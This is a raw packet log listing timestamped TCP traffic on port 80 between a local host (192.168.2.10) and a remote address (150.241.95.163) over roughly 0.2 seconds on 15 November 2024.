Nov 15, 2024 10:28:59.482956886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.482965946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.482985973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.483136892 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.485438108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.485450029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.485460997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.485488892 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.487095118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.487107992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.487118959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.487154007 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.487317085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.490315914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490356922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490370035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490394115 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.490417957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490430117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490441084 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490468025 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.490494013 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.490621090 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490637064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490727901 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490736961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.490751028 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.490807056 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.495193958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.495207071 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.495218992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.495263100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.498250008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.498261929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.498274088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.498320103 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.498492956 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.502232075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.502262115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.502271891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.502283096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.502307892 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.502379894 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.507246971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.507256985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.507263899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.507277012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.507328987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.507350922 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.510267973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.510332108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.510343075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.510417938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.516336918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.516406059 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.516427994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517468929 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517481089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517491102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517503023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517519951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.517563105 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.517621994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517635107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517644882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517678976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.517694950 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.517694950 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.521121979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.521183014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.521193981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.521198034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.521245956 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.524703026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.524717093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.524729013 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.524949074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.528515100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.528553009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.528570890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.528583050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.528589010 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.528600931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.528728962 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.531915903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.532000065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.532010078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.532020092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.532068014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.536252022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.536273003 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.536284924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.536295891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.536309004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.536396027 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545509100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545521975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545536995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545583963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545583963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545612097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545623064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545634985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545663118 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545816898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545829058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545847893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545861006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545872927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.545876980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545921087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.545921087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.546305895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.546319008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.546329975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.546766996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.549839020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.549860954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.549881935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.549911022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.549985886 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.553592920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.553615093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.553626060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.553678989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.556843042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556942940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556956053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556967020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556978941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556988955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.556998014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.557035923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573133945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573189974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573200941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573245049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573252916 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573252916 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573257923 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573271990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573283911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573316097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573333025 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573410034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573422909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573462963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573642015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573653936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573666096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573698997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573709965 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573717117 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573729038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.573753119 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.573776960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.574155092 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574172020 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574184895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574240923 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.574405909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574460030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.574520111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574532032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574544907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574557066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.574578047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.574619055 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.575915098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.575927019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.575937986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.576008081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.580856085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.580867052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.580913067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.580916882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.580965996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.580976009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.580981970 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.580988884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.581034899 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.581326008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.581336975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.581346989 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.581392050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.581392050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.582088947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582129002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582139015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582206011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.582247019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582257986 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582268000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.582295895 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.582365990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.585016966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.585028887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.585038900 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.585072994 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.587285995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587297916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587320089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587337971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587341070 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.587351084 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587377071 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.587399006 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.587498903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587510109 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587521076 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587532043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.587655067 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.587740898 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.592070103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.592161894 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.592173100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.592221975 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.594422102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.594489098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.594501019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.594532967 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.594557047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.594566107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.594635963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.594700098 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.596662998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.596709967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.596721888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.596765995 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.599596024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.599637032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.599656105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.599664927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.599709988 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.599709988 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.602524042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.602536917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.602555990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.602565050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.602576971 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.602591991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.602628946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.602628946 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.603936911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.603949070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.603961945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.604115009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608257055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608285904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608299017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608329058 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608355045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608367920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608411074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608411074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608505011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608515978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608526945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608606100 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608696938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608710051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608721018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.608783960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.608783960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.612158060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.612169981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.612179995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.612222910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.615272045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.615293026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.615304947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.615339041 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.615359068 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.619261026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.619309902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.619330883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.619342089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.619379997 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.624325991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.624340057 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.624351978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.624362946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.624397039 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.624432087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.627141953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.627171040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.627182007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.627226114 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.627229929 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.627237082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.627336979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.634260893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634289980 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634299994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634349108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.634349108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.634361029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634375095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634393930 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634450912 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.634789944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634802103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634813070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.634869099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.634869099 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.637867928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.637892008 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.637902021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.637913942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.637953997 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.641277075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.641685963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.641700029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.641711950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.641829967 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.645373106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645384073 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645399094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645416975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645428896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645440102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.645481110 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.645481110 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.648946047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.648979902 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.648989916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.648999929 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.649000883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.649035931 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.653001070 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653069973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.653196096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653207064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653219938 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653233051 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653244019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653255939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.653279066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.653279066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.653315067 CET	49762	80	192.168.2.10	150.241.95.163
